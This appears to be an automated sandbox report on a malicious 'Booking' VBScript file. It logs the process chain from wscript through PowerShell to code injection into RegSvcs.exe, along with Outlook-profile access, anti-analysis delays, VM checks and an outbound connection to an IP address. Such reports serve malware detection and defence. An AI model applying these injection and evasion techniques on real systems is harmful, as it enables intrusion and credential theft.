Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Booking_0731520.vbe | ReversingLabs: Detection: 25%
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Booking_0731520.vbe"
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\PPJeBFdmEDGXlnL.vbs" (2 identical entries)
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "8092" "2736" "2688" "2740" "0" "0" "2744" "0" "0" "0" "0" "0"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "8092" "2736" "2688" "2740" "0" "0" "2744" "0" "0" "0" "0" "0"
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttpcom.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll (2 identical entries)
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll (3 identical entries)
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wer.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: aepic.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06B2E480 push ecx; retn 0006h | 8_2_06B2E48A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06B2A4F5 push ecx; retn 0006h | 8_2_06B2A512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06B24D50 push es; ret | 8_2_06B24D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06B2DAC7 push ebp; iretd | 8_2_06B2DAC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06B2FBCD push es; iretd | 8_2_06B2FBDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06B2DB3F push ebp; iretd | 8_2_06B2DB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06B2FB10 push es; iretd | 8_2_06B2FB20
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (6 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (80 identical entries)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX (71 identical records)
                  Source: C:\Windows\System32\wermgr.exe | Process information set: NOOPENFILEERRORBOX (32 identical records)

                  Malware Analysis System Evasion

                  Source: C:\Windows\System32\wscript.exe | Dropped file: Do While CBL < 10000 ' Límite de iteraciones para demostración WScript.Sleep 10000 (the Spanish comment reads "Iteration limit for demonstration"; WScript.Sleep takes milliseconds, so each pass of the loop waits 10 s)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477 (2 identical records)
                  Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer (3 identical records)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5978
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3880
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 590
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 2995
                  Source: C:\Windows\System32\wscript.exe TID: 7280 | Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\System32\wscript.exe TID: 7340 | Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6128 | Thread sleep time: -8301034833169293s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 100000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99734
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99624
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99515
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99296
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99187
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99077
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98856
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98747
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98421
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98312
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98202
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98093
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
                  Source: wscript.exe, 00000000.00000003.2057998960.000001FE4C765000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2072048956.000001FE4C765000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2108624502.000001FE4C765000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2058319657.000001FE4C765000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2246918851.000001FE4C6F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2247215022.000001FE4C763000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2248955221.000001FE4C6FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2221847721.000001FE4C763000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209476075.000001FE4C765000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2247215022.000001FE4C6FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2249046009.000001FE4C763000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: RegSvcs.exe, 00000008.00000002.3298797995.0000000006346000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllsion
                  Source: wscript.exe, 00000000.00000003.2246918851.000001FE4C6F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2248955221.000001FE4C6FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2247215022.000001FE4C6FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RA1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\System32\wscript.exe | Network Connect: 172.67.215.48 443
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1150000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1150000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1152000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 118C000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 118E000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F27008
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "8092" "2736" "2688" "2740" "0" "0" "2744" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (3 identical records)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 identical records)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 identical records)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 identical records)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
